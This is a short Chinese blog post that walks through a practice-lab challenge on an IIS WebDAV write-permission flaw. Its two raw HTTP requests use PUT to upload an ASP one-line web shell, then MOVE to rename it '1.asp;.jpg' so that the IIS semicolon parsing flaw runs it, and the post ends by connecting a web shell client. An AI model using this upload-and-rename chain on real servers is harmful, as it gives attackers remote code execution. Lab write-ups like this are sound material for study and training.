【WEB】IIS写权限漏洞分析溯源

清疚 2022-05-16 09:46 273阅读 0赞

【原题】https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe

【解法】

1.首先iis scaner发现有put漏洞,但是无法用工具注入。

2.尝试用burp抓包修改写入 

  1. PUT /test.txt HTTP/1.1
  2. Host: 219.153.49.228:43672
  3. Pragma: no-cache
  4. Cache-Control: no-cache
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
  7. Accept: */*
  8. Accept-Encoding: gzip, deflate
  9. Accept-Language: en-US
  10. Connection: close
  11. Content-Length: 23
  13. <%eval request("123")%>

返回207说明成功写入

3.更改一句名称,利用iis漏洞,我们更名为1.asp;.jpg

burp写入

  1. MOVE /test.txt HTTP/1.1
  2. Host: 219.153.49.228:43672
  3. Destination: /1.asp;.jpg
  4. Pragma: no-cache
  5. Cache-Control: no-cache
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
  8. Accept: */*
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: en-US
  11. Connection: close
  12. Content-Length: 23
  14. <%eval request("123")%>

虽然返回207 Multi-Status, 但是这个文件确实可以访问,菜刀连接即可。

发表评论

表情:
评论列表 (有 0 条评论,273人围观)

还没有评论,来说两句吧...

相关阅读